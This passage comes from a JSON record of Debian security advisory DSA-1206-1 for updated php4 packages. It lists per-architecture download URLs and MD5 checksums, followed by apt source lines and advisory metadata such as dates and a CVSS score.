http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 21592 347945c9d9724838b43d11d8f1d4d5d6\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_mipsel.deb\n Size/MD5 checksum: 16164 9f74e955acaf979f87665c3376c0cfba\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 1661074 de33a92ea64c2550885a34babf3f5ae5\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 1659118 207692feed208166db82a46f076e938d\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 3280842 aaba5c02175be6b9aac9a0ff8d3a97aa\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 1646628 05931feddf04a8b49a0d6949a85ec9eb\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 167922 9186efbcb949031a5fccc92ba312ee38\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 19648 6da340b1fa5354815eaba491289986f5\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 325250 15eea0af4ce60a1dcfe1d7ae92afc402\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 38644 b4040bf7ecfe5b637313f9bc5e882888\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 34522 2e6be18ffa1aa076263a6da66a88c27e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 37694 507520edf8e62d12190a3784d9c5a0aa\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 21412 5cc50111e0d54a54a8ec1f2b7d0dbe30\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 19728 ba9ce16e48257a48a46a33cf341e54cb\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 9580 00eb12058d551beb520cecc1f34e8c59\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 22604 38e4691efa7d14d4bc03837f476df8f3\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 28678 8c9c39f6f82f3392b80e14cf275aef87\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 9288 de1312a2c4216b38eb6c1a22f5efe546\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 14962 707066edaffa958be582a9212f2a21cc\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 23042 4de2aa3b1d417f9d26e2e5bf1dd71788\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_powerpc.deb\n Size/MD5 checksum: 18272 a0efbed8f0c4b8a776c25e63f3342a8a\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_s390.deb\n Size/MD5 checksum: 1709170 9617e3bbeb9446df5c1900e28cfc52b1\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_s390.deb\n Size/MD5 checksum: 1708204 22f34f5b7a54d8f3451b7fe102957734\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_s390.deb\n Size/MD5 checksum: 3359814 b023379d97ef567f2683ac4b5f890971\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_s390.deb\n Size/MD5 checksum: 1686996 505abcc5893d0a3baeafd6e2b0b0eb31\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_s390.deb\n Size/MD5 checksum: 167916 e5523c78fa26ed7407fd67100e5a83ce\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_s390.deb\n Size/MD5 checksum: 17842 eb4b8cff51d8fa622a12d44d6bd5b565\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_s390.deb\n Size/MD5 checksum: 325198 fa39ecd9bb6fd108ace01971d5d760d8\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_s390.deb\n Size/MD5 checksum: 41124 e325433c9917a0f9ed78487b809486b8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_s390.deb\n Size/MD5 checksum: 33562 19bba35e8efcb6b6eed5902c4b65f64d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_s390.deb\n Size/MD5 checksum: 37390 f044f6504195d0e26c70e794a7ff1c19\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_s390.deb\n Size/MD5 checksum: 21422 41504297d336bbb1980a48a5ac31a8be\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_s390.deb\n Size/MD5 checksum: 17730 9a7635d7747ec80f38678b96c1104f25\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_s390.deb\n Size/MD5 checksum: 8404 8f214c43723e76ec8b0844787f7e4c98\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_s390.deb\n Size/MD5 checksum: 22932 42e45785723a8ab3271c8314c36ef810\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_s390.deb\n Size/MD5 checksum: 28870 958a0c1ad3980cc26ba6189cdf0cc021\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_s390.deb\n Size/MD5 checksum: 8046 e809d6ba139fc24b01b9555b201a3fc8\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_s390.deb\n Size/MD5 checksum: 13896 dc37c6e85e1b356ba613b38925748228\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_s390.deb\n Size/MD5 checksum: 22268 91fbdc05c3fcf7dfadeb43b3efc9994a\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_s390.deb\n Size/MD5 checksum: 17302 bd9c0b622afb237e5de2c554fffa5b9c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_sparc.deb\n Size/MD5 checksum: 1623888 ee4aedd6b606aba754a303a541c77919\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_sparc.deb\n Size/MD5 checksum: 1620786 24dc831a486a402d8f136a0a5a5faecf\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_sparc.deb\n Size/MD5 checksum: 3197026 c8bc2f63cd0efd85baa0375b6efe86b0\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_sparc.deb\n Size/MD5 checksum: 1605892 78a3c37f4af1c88784c01fd851da2210\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_sparc.deb\n Size/MD5 checksum: 167940 16e45134f678a7511f3ef6b0e5ec86b9\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_sparc.deb\n Size/MD5 checksum: 18082 e11be70c03c1c1c2abe1c3c3f7cfb83d\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_sparc.deb\n Size/MD5 checksum: 325308 440df8a0434ac65f4aa1199e33015da1\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_sparc.deb\n Size/MD5 checksum: 36492 3f654fa0a80786edb8302fb23ad0c965\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_sparc.deb\n Size/MD5 checksum: 31942 cd693e51e4e75e60c7d6d827988bf721\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_sparc.deb\n Size/MD5 checksum: 36192 12252492284b653d5286098d1d2056a2\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_sparc.deb\n Size/MD5 checksum: 19286 8fb4f461f23b0e388939498c75a06055\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_sparc.deb\n Size/MD5 checksum: 17494 31449be7b22340e753e49e21106d8231\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-18_sparc.deb\n Size/MD5 checksum: 7874 9166cab619fd43713eec88016096bd1c\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-18_sparc.deb\n Size/MD5 checksum: 20672 a9b3e7d4ed1a95b16b401c7a8c0db990\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-18_sparc.deb\n Size/MD5 checksum: 26542 87c822f25db53c283f5ff8fb0dc6f261\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-18_sparc.deb\n Size/MD5 checksum: 7598 05e5f7e761f14797c0f7babd747f14c7\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-18_sparc.deb\n Size/MD5 checksum: 12840 59e5bf49084a5eff48987b8b884e51e3\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-18_sparc.deb\n Size/MD5 checksum: 20848 8eb304df470d8144050b1797d8b67b9d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-18_sparc.deb\n Size/MD5 checksum: 15866 ac6ef12e44e28426818b29e94f177f48\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2006-11-06T00:00:00", "published": "2006-11-06T00:00:00", "id": "DEBIAN:DSA-1206-1:A74A0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00302.html", "title": "[SECURITY] [DSA 1206-1] New php4 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}